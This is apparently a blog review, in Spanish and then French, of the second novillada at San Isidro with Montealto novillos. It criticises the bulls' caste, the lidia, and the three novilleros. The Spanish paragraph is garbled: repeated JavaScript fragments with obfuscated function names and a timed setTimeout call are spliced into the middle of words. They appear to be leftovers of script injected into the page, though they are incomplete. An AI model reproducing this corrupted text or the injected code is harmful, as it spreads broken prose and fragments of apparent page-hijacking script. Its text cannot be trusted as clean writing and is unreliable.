BUENA NOVILLADA DE MONTEALTOBONNE NOVILLADA DE MONTEALTO

San Isidro, 2ª novillada. Bien presentada, en general brava en varas, noble y con embestidas enclasadas, pero muy justa de casta, no se prestó para que los novilleros se acoplaran con ella. ¿Por qué? Hubo errores en la lidia, se la picó unas veces mal y otras mucho, como al 3º, primero de Andy Younes, se la bregó en exceso, y todo ello, sumado a la poca casta y a la excesiva entrega de los novillos en los dos primeros tercios, hizo que se defendieran en la muleta rebrincandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, acortandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando su embestidas, parándose… Lástima de bravura mal entendida, porque en el desacople también colaboraron los novilleros por mala colocación y torpe presentación del engaño (altura, distancia), por falta de intuición en la oportunidad de los toques.

Al mexicano Leo Valdez le vi variado con la capa y vulgar con la muleta; al español Diego Carretero, valiente de corazón y torpe de cabeza; y al francés Andy Younes, elegante con la capa y frágil con la muleta. Eso sí, hizo el paseillo más cursi que he visto en mi vida. Parecía el primer bailarín de la Opera de Paris.

San Isidro. 2ème novillada. Bien présentée, brave en général à la pique, noble et avec de la classe dans ses charges, mais très juste de caste, elle ne permit pas aux novilleros de profiter pleinement d’elle. Pourquoi ? Il y eut des erreurs dans la lidia, on l’a parfois mal piqué et d’autres trop, comme le 3ème, premier d’Andy Younes, on a abusé des passes à la cape, et tout cela, rajouté à son manque de caste et à l’engagement excessif des novilleros lors des deux premiers tiers, provoqua leur comportement à la défensive à la muleta, sautant, stoppant leurs charges, s’arrêtant… Dommage que la bravoure fut mal comprise, car dans ce désajustement furent complices les novilleros par leur mauvais placement et leur maladroite présentation des leurres (hauteur, distance), par manque d’intuition sur le moment de faire le toque.

Le Mexicain Leo Valdez a été varié à la cape et vulgaire à la muleta ; l’Espagnol Diego Carretero, vaillant de cœur mais maladroit de la tête ; et le Français Andy Younes élégant à la cape mais fragile à la muleta. Par contre, il a fait le paseo le plus affecté que j’ai vu jamais de vu de ma vie. On aurait dit un danseur de l’Opéra de Paris.

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